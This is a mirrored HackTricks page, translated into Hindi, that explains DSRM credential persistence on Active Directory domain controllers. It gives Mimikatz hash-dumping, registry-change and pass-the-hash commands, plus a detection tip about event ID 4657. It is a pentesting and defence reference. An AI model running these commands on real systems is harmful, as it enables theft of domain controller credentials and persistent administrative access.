Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00

Translator workflow 75e8745ba3 Translated to Hindi

2023-11-06 08:38:02 +00:00

7.6 KiB

Raw Blame History

☁️ HackTricks क्लाउड ☁️ -🐦 ट्विटर 🐦 - 🎙️ ट्विच 🎙️ - 🎥 यूट्यूब 🎥

क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति चाहिए? सदस्यता योजनाएं की जांच करें!
खोजें The PEASS Family, हमारा विशेष संग्रह NFTs
प्राप्त करें आधिकारिक PEASS & HackTricks swag
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या मुझे ट्विटर पर फ़ॉलो करें 🐦@carlospolopm.
अपने हैकिंग ट्रिक्स को hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके साझा करें।

DSRM क्रेडेंशियल्स

प्रत्येक डीसी में एक स्थानीय प्रशासक खाता होता है। इस मशीन में व्यवस्थापक अधिकार होने के साथ, आप मिमीकेट्स का उपयोग करके स्थानीय प्रशासक हैश डंप कर सकते हैं। फिर, इस पासवर्ड को सक्रिय करने के लिए एक रजिस्ट्री को संशोधित करके आप इस स्थानीय प्रशासक उपयोगकर्ता के लिए दूरस्थ रूप से पहुंच कर सकते हैं।
सबसे पहले हमें डीसी के भीतर स्थानीय प्रशासक उपयोगकर्ता का हैश डंप करना होगा:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

तब हमें यह जांचना होगा कि क्या वह खाता काम करेगा, और यदि रजिस्ट्री की मुख्या कुंजी में मान "0" है या यह मौजूद नहीं है, तो आपको इसे "2" पर सेट करना होगा:

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

तब, एक PTH का उपयोग करके आप C$ की सामग्री की सूची बना सकते हैं या यहां तक कि एक शैल प्राप्त कर सकते हैं। ध्यान दें कि उस हैश के साथ मेमोरी में उस पावरशेल सत्र को बनाने के लिए (PTH के लिए) "डोमेन" का उपयोग किया जाता है, वह सिर्फ DC मशीन का नाम होता है:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

इसके बारे में अधिक जानकारी के लिए यहां देखें: https://adsecurity.org/?p=1714 और https://adsecurity.org/?p=1785

सुरक्षा उपाय

ईवेंट आईडी 4657 - HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior के निर्माण/परिवर्तन की निगरानी करें

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

क्या आप किसी साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की उपलब्धता चाहिए? सदस्यता योजनाएं की जांच करें!
खोजें The PEASS Family, हमारा विशेष NFT संग्रह
प्राप्त करें आधिकारिक PEASS और HackTricks स्वैग
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या मुझे ट्विटर पर फ़ॉलो करें 🐦@carlospolopm.
अपने हैकिंग ट्रिक्स को hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके साझा करें।

7.6 KiB Raw Blame History

DSRM क्रेडेंशियल्स

सुरक्षा उपाय

7.6 KiB

Raw Blame History